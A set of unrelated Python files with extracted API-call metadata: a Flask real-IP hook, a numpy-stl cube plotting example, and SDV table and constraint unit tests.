), str(ctx.exception)
)
finally:
inst.stop()
|
[
"WatchmanInstance.Instance"
] |
[((1095, 1135), 'WatchmanInstance.Instance', 'WatchmanInstance.Instance', ([], {'config': 'config'}), '(config=config)\n', (1120, 1135), False, 'import WatchmanInstance\n')]
|
#!/usr/bin/env python
# coding: utf-8
from flask import request, g, make_response
from flask_helper.flask_hook import FlaskHook
from flask_helper.utils.ip import ip_value_str
__author__ = 'zhouhenglc'
class RealIPHook(FlaskHook):
def __init__(self, app, trust_proxy=None,
forwarded_key="X-Forwarded-For"):
FlaskHook.__init__(self, app)
if trust_proxy is None:
trust_proxy = []
self.trust_proxy = list(trust_proxy)
self.forwarded_key = forwarded_key
def before_request(self):
request_ip = request.remote_addr
if self.forwarded_key in request.headers \
and request_ip in self.trust_proxy:
l_ip = request.headers[self.forwarded_key].split(",")
request_ip = l_ip[0]
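            # Walk the forwarded chain from the nearest proxy backwards; the first
            # hop that is not a trusted proxy is taken as the real client address.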
if isinstance(self.trust_proxy, list):
for i in range(len(l_ip) - 1, -1, -1):
one_proxy = l_ip[i].strip()
if one_proxy not in self.trust_proxy:
request_ip = one_proxy
break
g.remote_addr = request_ip
g.ip_value = ip_value_str(ip_str=request_ip)
if g.ip_value == 0:
            return make_response("IP restricted", 403)
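# Illustrative usage (a minimal sketch; assumes FlaskHook registers the
# before_request handler when constructed, which is not shown here):
#   RealIPHook(app, trust_proxy=["127.0.0.1"])
#   # handlers can then read g.remote_addr / g.ip_value for the real client IP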
|
[
"flask.make_response",
"flask_helper.utils.ip.ip_value_str",
"flask_helper.flask_hook.FlaskHook.__init__"
] |
[((341, 370), 'flask_helper.flask_hook.FlaskHook.__init__', 'FlaskHook.__init__', (['self', 'app'], {}), '(self, app)\n', (359, 370), False, 'from flask_helper.flask_hook import FlaskHook\n'), ((1139, 1170), 'flask_helper.utils.ip.ip_value_str', 'ip_value_str', ([], {'ip_str': 'request_ip'}), '(ip_str=request_ip)\n', (1151, 1170), False, 'from flask_helper.utils.ip import ip_value_str\n'), ((1218, 1244), 'flask.make_response', 'make_response', (['"""IP restricted"""', '(403)'], {}), "('IP restricted', 403)\n", (1231, 1244), False, 'from flask import request, g, make_response\n')]
|
from stl import mesh
import math
import numpy
# Create 3 faces of a cube
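# (each square face consists of two triangles, hence 6 vectors for 3 faces)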
data = numpy.zeros(6, dtype=mesh.Mesh.dtype)
# Top of the cube
data['vectors'][0] = numpy.array([[0, 1, 1],
[1, 0, 1],
[0, 0, 1]])
data['vectors'][1] = numpy.array([[1, 0, 1],
[0, 1, 1],
[1, 1, 1]])
# Front face
data['vectors'][2] = numpy.array([[1, 0, 0],
[1, 0, 1],
[1, 1, 0]])
data['vectors'][3] = numpy.array([[1, 1, 1],
[1, 0, 1],
[1, 1, 0]])
# Left face
data['vectors'][4] = numpy.array([[0, 0, 0],
[1, 0, 0],
[1, 0, 1]])
data['vectors'][5] = numpy.array([[0, 0, 0],
[0, 0, 1],
[1, 0, 1]])
# Since the cube faces are from 0 to 1 we can move it to the middle by
# subtracting .5
data['vectors'] -= .5
# Generate 4 different meshes so we can rotate them later
meshes = [mesh.Mesh(data.copy()) for _ in range(4)]
# Rotate 90 degrees over the Y axis
meshes[0].rotate([0.0, 0.5, 0.0], math.radians(90))
# Translate 2 points over the X axis
meshes[1].x += 2
# Rotate 90 degrees over the X axis
meshes[2].rotate([0.5, 0.0, 0.0], math.radians(90))
# Translate 2 points over the X and Y points
meshes[2].x += 2
meshes[2].y += 2
# Rotate 90 degrees over the X and Y axis
meshes[3].rotate([0.5, 0.0, 0.0], math.radians(90))
meshes[3].rotate([0.0, 0.5, 0.0], math.radians(90))
# Translate 2 points over the Y axis
meshes[3].y += 2
# Optionally render the rotated cube faces
from matplotlib import pyplot
from mpl_toolkits import mplot3d
# Create a new plot
figure = pyplot.figure()
axes = mplot3d.Axes3D(figure)
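# Note: on recent Matplotlib releases, 3D axes are usually created with
# figure.add_subplot(projection="3d"); constructing Axes3D directly no longer
# attaches the axes to the figure automatically.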
# Render the cube faces
for m in meshes:
axes.add_collection3d(mplot3d.art3d.Poly3DCollection(m.vectors))
# Auto scale to the mesh size
scale = numpy.concatenate([m.points for m in meshes]).flatten()
axes.auto_scale_xyz(scale, scale, scale)
# Show the plot to the screen
pyplot.show()
|
[
"matplotlib.pyplot.show",
"mpl_toolkits.mplot3d.Axes3D",
"math.radians",
"numpy.zeros",
"mpl_toolkits.mplot3d.art3d.Poly3DCollection",
"matplotlib.pyplot.figure",
"numpy.array",
"numpy.concatenate"
] |
[((81, 118), 'numpy.zeros', 'numpy.zeros', (['(6)'], {'dtype': 'mesh.Mesh.dtype'}), '(6, dtype=mesh.Mesh.dtype)\n', (92, 118), False, 'import numpy\n'), ((159, 205), 'numpy.array', 'numpy.array', (['[[0, 1, 1], [1, 0, 1], [0, 0, 1]]'], {}), '([[0, 1, 1], [1, 0, 1], [0, 0, 1]])\n', (170, 205), False, 'import numpy\n'), ((295, 341), 'numpy.array', 'numpy.array', (['[[1, 0, 1], [0, 1, 1], [1, 1, 1]]'], {}), '([[1, 0, 1], [0, 1, 1], [1, 1, 1]])\n', (306, 341), False, 'import numpy\n'), ((444, 490), 'numpy.array', 'numpy.array', (['[[1, 0, 0], [1, 0, 1], [1, 1, 0]]'], {}), '([[1, 0, 0], [1, 0, 1], [1, 1, 0]])\n', (455, 490), False, 'import numpy\n'), ((580, 626), 'numpy.array', 'numpy.array', (['[[1, 1, 1], [1, 0, 1], [1, 1, 0]]'], {}), '([[1, 1, 1], [1, 0, 1], [1, 1, 0]])\n', (591, 626), False, 'import numpy\n'), ((728, 774), 'numpy.array', 'numpy.array', (['[[0, 0, 0], [1, 0, 0], [1, 0, 1]]'], {}), '([[0, 0, 0], [1, 0, 0], [1, 0, 1]])\n', (739, 774), False, 'import numpy\n'), ((864, 910), 'numpy.array', 'numpy.array', (['[[0, 0, 0], [0, 0, 1], [1, 0, 1]]'], {}), '([[0, 0, 0], [0, 0, 1], [1, 0, 1]])\n', (875, 910), False, 'import numpy\n'), ((1853, 1868), 'matplotlib.pyplot.figure', 'pyplot.figure', ([], {}), '()\n', (1866, 1868), False, 'from matplotlib import pyplot\n'), ((1876, 1898), 'mpl_toolkits.mplot3d.Axes3D', 'mplot3d.Axes3D', (['figure'], {}), '(figure)\n', (1890, 1898), False, 'from mpl_toolkits import mplot3d\n'), ((2179, 2192), 'matplotlib.pyplot.show', 'pyplot.show', ([], {}), '()\n', (2190, 2192), False, 'from matplotlib import pyplot\n'), ((1273, 1289), 'math.radians', 'math.radians', (['(90)'], {}), '(90)\n', (1285, 1289), False, 'import math\n'), ((1417, 1433), 'math.radians', 'math.radians', (['(90)'], {}), '(90)\n', (1429, 1433), False, 'import math\n'), ((1591, 1607), 'math.radians', 'math.radians', (['(90)'], {}), '(90)\n', (1603, 1607), False, 'import math\n'), ((1643, 1659), 'math.radians', 'math.radians', (['(90)'], {}), '(90)\n', (1655, 1659), False, 'import math\n'), ((1967, 2008), 'mpl_toolkits.mplot3d.art3d.Poly3DCollection', 'mplot3d.art3d.Poly3DCollection', (['m.vectors'], {}), '(m.vectors)\n', (1997, 2008), False, 'from mpl_toolkits import mplot3d\n'), ((2049, 2094), 'numpy.concatenate', 'numpy.concatenate', (['[m.points for m in meshes]'], {}), '([m.points for m in meshes])\n', (2066, 2094), False, 'import numpy\n')]
|
from unittest.mock import Mock, patch
import pandas as pd
import pytest
from rdt.transformers.numerical import NumericalTransformer
from sdv.constraints.base import Constraint
from sdv.constraints.errors import MissingConstraintColumnError
from sdv.errors import ConstraintsNotMetError
from sdv.metadata import Table
class TestTable:
@patch.object(Constraint, 'from_dict')
def test__prepare_constraints_sorts_constraints(self, from_dict_mock):
"""Test that ``_prepare_constraints`` method sorts constraints.
The ``_prepare_constraints`` method should sort constraints by putting
constraints with ``rebuild_columns`` before the ones without them.
Input:
- list of constraints with some having ``rebuild_columns``
before constraints without them.
Output:
- List of constraints sorted properly.
"""
# Setup
constraint1 = Constraint(handling_strategy='transform')
constraint2 = Constraint(handling_strategy='transform')
constraint3 = Constraint(handling_strategy='reject_sampling')
constraints = [constraint1, constraint2, constraint3]
constraint1.rebuild_columns = ['a']
constraint2.rebuild_columns = ['b']
constraint3.rebuild_columns = []
from_dict_mock.side_effect = [constraint1, constraint2, constraint3]
# Run
sorted_constraints = Table._prepare_constraints(constraints)
# Asserts
assert sorted_constraints == [constraint3, constraint1, constraint2]
@patch.object(Constraint, 'from_dict')
def test__prepare_constraints_sorts_constraints_none_rebuild_columns(self, from_dict_mock):
"""Test that ``_prepare_constraints`` method sorts constraints.
The ``_prepare_constraints`` method should sort constraints with None as
``rebuild_columns`` before those that have them.
Input:
- list of constraints with some having None as ``rebuild_columns``
listed after those with ``rebuild_columns``.
Output:
- List of constraints sorted properly.
"""
# Setup
constraint1 = Constraint(handling_strategy='transform')
constraint2 = Constraint(handling_strategy='transform')
constraint3 = Constraint(handling_strategy='reject_sampling')
constraints = [constraint1, constraint2, constraint3]
constraint1.rebuild_columns = ['a']
constraint2.rebuild_columns = ['b']
constraint3.rebuild_columns = None
from_dict_mock.side_effect = [constraint1, constraint2, constraint3]
# Run
sorted_constraints = Table._prepare_constraints(constraints)
# Asserts
assert sorted_constraints == [constraint3, constraint1, constraint2]
@patch.object(Constraint, 'from_dict')
def test__prepare_constraints_validates_constraint_order(self, from_dict_mock):
"""Test the ``_prepare_constraints`` method validates the constraint order.
If no constraint has ``rebuild_columns`` that are in a later
constraint's ``constraint_columns``, no exception should be raised.
Input:
- List of constraints with none having ``rebuild_columns``
that are in a later constraint's ``constraint_columns``.
Output:
- Sorted list of constraints.
"""
# Setup
constraint1 = Constraint(handling_strategy='reject_sampling')
constraint2 = Constraint(handling_strategy='reject_sampling')
constraint3 = Constraint(handling_strategy='transform')
constraint4 = Constraint(handling_strategy='transform')
constraints = [constraint1, constraint2, constraint3, constraint4]
constraint3.rebuild_columns = ['e', 'd']
constraint4.constraint_columns = ['a', 'b', 'c']
constraint4.rebuild_columns = ['a']
from_dict_mock.side_effect = [constraint1, constraint2, constraint3, constraint4]
# Run
sorted_constraints = Table._prepare_constraints(constraints)
# Assert
assert sorted_constraints == constraints
@patch.object(Constraint, 'from_dict')
def test__prepare_constraints_invalid_order_raises_exception(self, from_dict_mock):
"""Test the ``_prepare_constraints`` method validates the constraint order.
If one constraint has ``rebuild_columns`` that are in a later
constraint's ``constraint_columns``, an exception should be raised.
Input:
- List of constraints with some having ``rebuild_columns``
that are in a later constraint's ``constraint_columns``.
Side Effect:
- Exception should be raised.
"""
# Setup
constraint1 = Constraint(handling_strategy='reject_sampling')
constraint2 = Constraint(handling_strategy='reject_sampling')
constraint3 = Constraint(handling_strategy='transform')
constraint4 = Constraint(handling_strategy='transform')
constraints = [constraint1, constraint2, constraint3, constraint4]
constraint3.rebuild_columns = ['a', 'd']
constraint4.constraint_columns = ['a', 'b', 'c']
constraint4.rebuild_columns = ['a']
from_dict_mock.side_effect = [constraint1, constraint2, constraint3, constraint4]
# Run
with pytest.raises(Exception):
Table._prepare_constraints(constraints)
@patch('sdv.metadata.table.rdt.transformers.NumericalTransformer',
spec_set=NumericalTransformer)
def test___init__(self, transformer_mock):
"""Test that ``__init__`` method passes parameters.
The ``__init__`` method should pass the custom parameters
to the ``NumericalTransformer``.
Input:
- rounding set to an int
- max_value set to an int
- min_value set to an int
Side Effects:
- ``NumericalTransformer`` should receive the correct parameters
"""
# Run
Table(rounding=-1, max_value=100, min_value=-50)
# Asserts
assert len(transformer_mock.mock_calls) == 2
transformer_mock.assert_any_call(
dtype=int, rounding=-1, max_value=100, min_value=-50)
transformer_mock.assert_any_call(
dtype=float, rounding=-1, max_value=100, min_value=-50)
@patch.object(Table, '_prepare_constraints')
def test___init__calls_prepare_constraints(self, _prepare_constraints_mock):
"""Test that ``__init__`` method calls ``_prepare_constraints"""
# Run
Table(constraints=[])
# Assert
        _prepare_constraints_mock.assert_called_once_with([])
def test__make_ids(self):
"""Test whether regex is correctly generating expressions."""
metadata = {'subtype': 'string', 'regex': '[a-d]'}
keys = Table._make_ids(metadata, 3)
assert (keys == pd.Series(['a', 'b', 'c'])).all()
def test__make_ids_fail(self):
"""Test if regex fails with more requested ids than available unique values."""
metadata = {'subtype': 'string', 'regex': '[a-d]'}
with pytest.raises(ValueError):
Table._make_ids(metadata, 20)
def test__make_ids_unique_field_not_unique(self):
"""Test that id column is replaced with all unique values if not already unique."""
metadata_dict = {
'fields': {
'item 0': {'type': 'id', 'subtype': 'integer'},
'item 1': {'type': 'boolean'}
},
'primary_key': 'item 0'
}
metadata = Table.from_dict(metadata_dict)
data = pd.DataFrame({
'item 0': [0, 1, 1, 2, 3, 5, 5, 6],
'item 1': [True, True, False, False, True, False, False, True]
})
new_data = metadata.make_ids_unique(data)
assert new_data['item 1'].equals(data['item 1'])
assert new_data['item 0'].is_unique
def test__make_ids_unique_field_already_unique(self):
"""Test that id column is kept if already unique."""
metadata_dict = {
'fields': {
'item 0': {'type': 'id', 'subtype': 'integer'},
'item 1': {'type': 'boolean'}
},
'primary_key': 'item 0'
}
metadata = Table.from_dict(metadata_dict)
data = pd.DataFrame({
'item 0': [9, 1, 8, 2, 3, 7, 5, 6],
'item 1': [True, True, False, False, True, False, False, True]
})
new_data = metadata.make_ids_unique(data)
assert new_data['item 1'].equals(data['item 1'])
assert new_data['item 0'].equals(data['item 0'])
def test__make_ids_unique_field_index_out_of_order(self):
"""Test that updated id column is unique even if index is out of order."""
metadata_dict = {
'fields': {
'item 0': {'type': 'id', 'subtype': 'integer'},
'item 1': {'type': 'boolean'}
},
'primary_key': 'item 0'
}
metadata = Table.from_dict(metadata_dict)
data = pd.DataFrame({
'item 0': [0, 1, 1, 2, 3, 5, 5, 6],
'item 1': [True, True, False, False, True, False, False, True]
}, index=[0, 1, 1, 2, 3, 5, 5, 6])
new_data = metadata.make_ids_unique(data)
assert new_data['item 1'].equals(data['item 1'])
assert new_data['item 0'].is_unique
def test_transform_calls__transform_constraints(self):
"""Test that the `transform` method calls `_transform_constraints` with right parameters
The ``transform`` method is expected to call the ``_transform_constraints`` method
with the data and correct value for ``on_missing_column``.
Input:
- Table data
Side Effects:
- Calls _transform_constraints
"""
# Setup
data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [True, True, False]
}, index=[0, 1, 2])
dtypes = {'item 0': 'int', 'item 1': 'bool'}
table_mock = Mock()
table_mock.get_dtypes.return_value = dtypes
table_mock._transform_constraints.return_value = data
table_mock._anonymize.return_value = data
table_mock._hyper_transformer.transform.return_value = data
# Run
Table.transform(table_mock, data, 'error')
# Assert
expected_data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [True, True, False]
}, index=[0, 1, 2])
mock_calls = table_mock._transform_constraints.mock_calls
args = mock_calls[0][1]
assert len(mock_calls) == 1
assert args[0].equals(expected_data)
assert args[1] == 'error'
def test__transform_constraints(self):
"""Test that method correctly transforms data based on constraints
The ``_transform_constraints`` method is expected to loop through constraints
and call each constraint's ``transform`` method on the data.
Input:
- Table data
Output:
- Transformed data
"""
# Setup
data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [3, 4, 5]
}, index=[0, 1, 2])
transformed_data = pd.DataFrame({
'item 0': [0, 0.5, 1],
'item 1': [6, 8, 10]
}, index=[0, 1, 2])
first_constraint_mock = Mock()
second_constraint_mock = Mock()
first_constraint_mock.transform.return_value = transformed_data
        second_constraint_mock.transform.return_value = transformed_data
table_mock = Mock()
table_mock._constraints = [first_constraint_mock, second_constraint_mock]
# Run
result = Table._transform_constraints(table_mock, data)
# Assert
assert result.equals(transformed_data)
first_constraint_mock.transform.assert_called_once_with(data)
second_constraint_mock.transform.assert_called_once_with(transformed_data)
def test__transform_constraints_raises_error(self):
"""Test that method raises error when specified.
The ``_transform_constraints`` method is expected to raise ``MissingConstraintColumnError``
if the constraint transform raises one and ``on_missing_column`` is set to error.
Input:
- Table data
Side Effects:
- MissingConstraintColumnError
"""
# Setup
data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.transform.side_effect = MissingConstraintColumnError
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run/Assert
with pytest.raises(MissingConstraintColumnError):
Table._transform_constraints(table_mock, data, 'error')
def test__transform_constraints_drops_columns(self):
"""Test that method drops columns when specified.
The ``_transform_constraints`` method is expected to drop columns associated with
        a constraint if its transform raises a MissingConstraintColumnError and ``on_missing_column``
is set to drop.
Input:
- Table data
Output:
- Table with dropped columns
"""
# Setup
data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.transform.side_effect = MissingConstraintColumnError
constraint_mock.constraint_columns = ['item 0']
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run
result = Table._transform_constraints(table_mock, data, 'drop')
# Assert
expected_result = pd.DataFrame({
'item 1': [3, 4, 5]
}, index=[0, 1, 2])
assert result.equals(expected_result)
def test__validate_data_on_constraints(self):
"""Test the ``Table._validate_data_on_constraints`` method.
        Expect that the method passes silently (returns None) when the constraint columns
        are in the given data and the constraint.is_valid method returns True.
Input:
- Table data
Output:
- None
Side Effects:
- No error
"""
# Setup
data = pd.DataFrame({
'a': [0, 1, 2],
'b': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.is_valid.return_value = pd.Series([True, True, True])
constraint_mock.constraint_columns = ['a', 'b']
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run
result = Table._validate_data_on_constraints(table_mock, data)
# Assert
assert result is None
def test__validate_data_on_constraints_invalid_input(self):
"""Test the ``Table._validate_data_on_constraints`` method.
        Expect that the method raises an error when the constraint columns are in the given
        data and the constraint.is_valid method returns False for any row.
Input:
- Table data contains an invalid row
Output:
- None
Side Effects:
- A ConstraintsNotMetError is thrown
"""
# Setup
data = pd.DataFrame({
'a': [0, 1, 2],
'b': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.is_valid.return_value = pd.Series([True, False, True])
constraint_mock.constraint_columns = ['a', 'b']
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run and assert
with pytest.raises(ConstraintsNotMetError):
Table._validate_data_on_constraints(table_mock, data)
def test__validate_data_on_constraints_missing_cols(self):
"""Test the ``Table._validate_data_on_constraints`` method.
        Expect that the method passes silently (returns None) when the constraint columns
        are not in the given data.
Input:
- Table data that is missing a constraint column
Output:
- None
Side Effects:
- No error
"""
# Setup
data = pd.DataFrame({
'a': [0, 1, 2],
'b': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.constraint_columns = ['a', 'b', 'c']
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run
result = Table._validate_data_on_constraints(table_mock, data)
# Assert
assert result is None
|
[
"pandas.DataFrame",
"unittest.mock.patch.object",
"sdv.metadata.Table.from_dict",
"sdv.metadata.Table._transform_constraints",
"sdv.metadata.Table._validate_data_on_constraints",
"unittest.mock.Mock",
"sdv.metadata.Table._make_ids",
"sdv.metadata.Table._prepare_constraints",
"unittest.mock.patch",
"sdv.metadata.Table",
"sdv.metadata.Table.transform",
"pytest.raises",
"sdv.constraints.base.Constraint",
"pandas.Series"
] |
[((344, 381), 'unittest.mock.patch.object', 'patch.object', (['Constraint', '"""from_dict"""'], {}), "(Constraint, 'from_dict')\n", (356, 381), False, 'from unittest.mock import Mock, patch\n'), ((1551, 1588), 'unittest.mock.patch.object', 'patch.object', (['Constraint', '"""from_dict"""'], {}), "(Constraint, 'from_dict')\n", (1563, 1588), False, 'from unittest.mock import Mock, patch\n'), ((2785, 2822), 'unittest.mock.patch.object', 'patch.object', (['Constraint', '"""from_dict"""'], {}), "(Constraint, 'from_dict')\n", (2797, 2822), False, 'from unittest.mock import Mock, patch\n'), ((4107, 4144), 'unittest.mock.patch.object', 'patch.object', (['Constraint', '"""from_dict"""'], {}), "(Constraint, 'from_dict')\n", (4119, 4144), False, 'from unittest.mock import Mock, patch\n'), ((5394, 5495), 'unittest.mock.patch', 'patch', (['"""sdv.metadata.table.rdt.transformers.NumericalTransformer"""'], {'spec_set': 'NumericalTransformer'}), "('sdv.metadata.table.rdt.transformers.NumericalTransformer', spec_set=\n NumericalTransformer)\n", (5399, 5495), False, 'from unittest.mock import Mock, patch\n'), ((6308, 6351), 'unittest.mock.patch.object', 'patch.object', (['Table', '"""_prepare_constraints"""'], {}), "(Table, '_prepare_constraints')\n", (6320, 6351), False, 'from unittest.mock import Mock, patch\n'), ((921, 962), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""transform"""'}), "(handling_strategy='transform')\n", (931, 962), False, 'from sdv.constraints.base import Constraint\n'), ((985, 1026), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""transform"""'}), "(handling_strategy='transform')\n", (995, 1026), False, 'from sdv.constraints.base import Constraint\n'), ((1049, 1096), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""reject_sampling"""'}), "(handling_strategy='reject_sampling')\n", (1059, 1096), False, 'from sdv.constraints.base import Constraint\n'), ((1409, 1448), 'sdv.metadata.Table._prepare_constraints', 'Table._prepare_constraints', (['constraints'], {}), '(constraints)\n', (1435, 1448), False, 'from sdv.metadata import Table\n'), ((2153, 2194), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""transform"""'}), "(handling_strategy='transform')\n", (2163, 2194), False, 'from sdv.constraints.base import Constraint\n'), ((2217, 2258), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""transform"""'}), "(handling_strategy='transform')\n", (2227, 2258), False, 'from sdv.constraints.base import Constraint\n'), ((2281, 2328), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""reject_sampling"""'}), "(handling_strategy='reject_sampling')\n", (2291, 2328), False, 'from sdv.constraints.base import Constraint\n'), ((2643, 2682), 'sdv.metadata.Table._prepare_constraints', 'Table._prepare_constraints', (['constraints'], {}), '(constraints)\n', (2669, 2682), False, 'from sdv.metadata import Table\n'), ((3389, 3436), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""reject_sampling"""'}), "(handling_strategy='reject_sampling')\n", (3399, 3436), False, 'from sdv.constraints.base import Constraint\n'), ((3459, 3506), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""reject_sampling"""'}), "(handling_strategy='reject_sampling')\n", (3469, 3506), False, 'from sdv.constraints.base import Constraint\n'), ((3529, 3570), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""transform"""'}), "(handling_strategy='transform')\n", (3539, 3570), False, 'from sdv.constraints.base import Constraint\n'), ((3593, 3634), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""transform"""'}), "(handling_strategy='transform')\n", (3603, 3634), False, 'from sdv.constraints.base import Constraint\n'), ((3994, 4033), 'sdv.metadata.Table._prepare_constraints', 'Table._prepare_constraints', (['constraints'], {}), '(constraints)\n', (4020, 4033), False, 'from sdv.metadata import Table\n'), ((4721, 4768), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""reject_sampling"""'}), "(handling_strategy='reject_sampling')\n", (4731, 4768), False, 'from sdv.constraints.base import Constraint\n'), ((4791, 4838), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""reject_sampling"""'}), "(handling_strategy='reject_sampling')\n", (4801, 4838), False, 'from sdv.constraints.base import Constraint\n'), ((4861, 4902), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""transform"""'}), "(handling_strategy='transform')\n", (4871, 4902), False, 'from sdv.constraints.base import Constraint\n'), ((4925, 4966), 'sdv.constraints.base.Constraint', 'Constraint', ([], {'handling_strategy': '"""transform"""'}), "(handling_strategy='transform')\n", (4935, 4966), False, 'from sdv.constraints.base import Constraint\n'), ((5963, 6011), 'sdv.metadata.Table', 'Table', ([], {'rounding': '(-1)', 'max_value': '(100)', 'min_value': '(-50)'}), '(rounding=-1, max_value=100, min_value=-50)\n', (5968, 6011), False, 'from sdv.metadata import Table\n'), ((6528, 6549), 'sdv.metadata.Table', 'Table', ([], {'constraints': '[]'}), '(constraints=[])\n', (6533, 6549), False, 'from sdv.metadata import Table\n'), ((6798, 6826), 'sdv.metadata.Table._make_ids', 'Table._make_ids', (['metadata', '(3)'], {}), '(metadata, 3)\n', (6813, 6826), False, 'from sdv.metadata import Table\n'), ((7537, 7567), 'sdv.metadata.Table.from_dict', 'Table.from_dict', (['metadata_dict'], {}), '(metadata_dict)\n', (7552, 7567), False, 'from sdv.metadata import Table\n'), ((7583, 7702), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 0': [0, 1, 1, 2, 3, 5, 5, 6], 'item 1': [True, True, False, False, \n True, False, False, True]}"], {}), "({'item 0': [0, 1, 1, 2, 3, 5, 5, 6], 'item 1': [True, True, \n False, False, True, False, False, True]})\n", (7595, 7702), True, 'import pandas as pd\n'), ((8245, 8275), 'sdv.metadata.Table.from_dict', 'Table.from_dict', (['metadata_dict'], {}), '(metadata_dict)\n', (8260, 8275), False, 'from sdv.metadata import Table\n'), ((8291, 8410), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 0': [9, 1, 8, 2, 3, 7, 5, 6], 'item 1': [True, True, False, False, \n True, False, False, True]}"], {}), "({'item 0': [9, 1, 8, 2, 3, 7, 5, 6], 'item 1': [True, True, \n False, False, True, False, False, True]})\n", (8303, 8410), True, 'import pandas as pd\n'), ((8992, 9022), 'sdv.metadata.Table.from_dict', 'Table.from_dict', (['metadata_dict'], {}), '(metadata_dict)\n', (9007, 9022), False, 'from sdv.metadata import Table\n'), ((9038, 9189), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 0': [0, 1, 1, 2, 3, 5, 5, 6], 'item 1': [True, True, False, False, \n True, False, False, True]}"], {'index': '[0, 1, 1, 2, 3, 5, 5, 6]'}), "({'item 0': [0, 1, 1, 2, 3, 5, 5, 6], 'item 1': [True, True, \n False, False, True, False, False, True]}, index=[0, 1, 1, 2, 3, 5, 5, 6])\n", (9050, 9189), True, 'import pandas as pd\n'), ((9829, 9916), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 0': [0, 1, 2], 'item 1': [True, True, False]}"], {'index': '[0, 1, 2]'}), "({'item 0': [0, 1, 2], 'item 1': [True, True, False]}, index=[0,\n 1, 2])\n", (9841, 9916), True, 'import pandas as pd\n'), ((10021, 10027), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (10025, 10027), False, 'from unittest.mock import Mock, patch\n'), ((10283, 10325), 'sdv.metadata.Table.transform', 'Table.transform', (['table_mock', 'data', '"""error"""'], {}), "(table_mock, data, 'error')\n", (10298, 10325), False, 'from sdv.metadata import Table\n'), ((10368, 10455), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 0': [0, 1, 2], 'item 1': [True, True, False]}"], {'index': '[0, 1, 2]'}), "({'item 0': [0, 1, 2], 'item 1': [True, True, False]}, index=[0,\n 1, 2])\n", (10380, 10455), True, 'import pandas as pd\n'), ((11097, 11170), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 0': [0, 1, 2], 'item 1': [3, 4, 5]}"], {'index': '[0, 1, 2]'}), "({'item 0': [0, 1, 2], 'item 1': [3, 4, 5]}, index=[0, 1, 2])\n", (11109, 11170), True, 'import pandas as pd\n'), ((11232, 11308), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 0': [0, 0.5, 1], 'item 1': [6, 8, 10]}"], {'index': '[0, 1, 2]'}), "({'item 0': [0, 0.5, 1], 'item 1': [6, 8, 10]}, index=[0, 1, 2])\n", (11244, 11308), True, 'import pandas as pd\n'), ((11375, 11381), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (11379, 11381), False, 'from unittest.mock import Mock, patch\n'), ((11415, 11421), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (11419, 11421), False, 'from unittest.mock import Mock, patch\n'), ((11578, 11584), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (11582, 11584), False, 'from unittest.mock import Mock, patch\n'), ((11699, 11745), 'sdv.metadata.Table._transform_constraints', 'Table._transform_constraints', (['table_mock', 'data'], {}), '(table_mock, data)\n', (11727, 11745), False, 'from sdv.metadata import Table\n'), ((12410, 12483), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 0': [0, 1, 2], 'item 1': [3, 4, 5]}"], {'index': '[0, 1, 2]'}), "({'item 0': [0, 1, 2], 'item 1': [3, 4, 5]}, index=[0, 1, 2])\n", (12422, 12483), True, 'import pandas as pd\n'), ((12544, 12550), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (12548, 12550), False, 'from unittest.mock import Mock, patch\n'), ((12649, 12655), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (12653, 12655), False, 'from unittest.mock import Mock, patch\n'), ((13319, 13392), 'pandas.DataFrame', 'pd.DataFrame', (["{'item 0': [0, 1, 2], 'item 1': [3, 4, 5]}"], {'index': '[0, 1, 2]'}), "({'item 0': [0, 1, 2], 'item 1': [3, 4, 5]}, index=[0, 1, 2])\n", (13331, 13392), True, 'import pandas as pd\n'), ((13453, 13459), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (13457, 13459), False, 'from unittest.mock import Mock, patch\n'), ((13614, 13620), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (13618, 13620), False, 'from unittest.mock import Mock, patch\n'), ((13705, 13759), 'sdv.metadata.Table._transform_constraints', 'Table._transform_constraints', 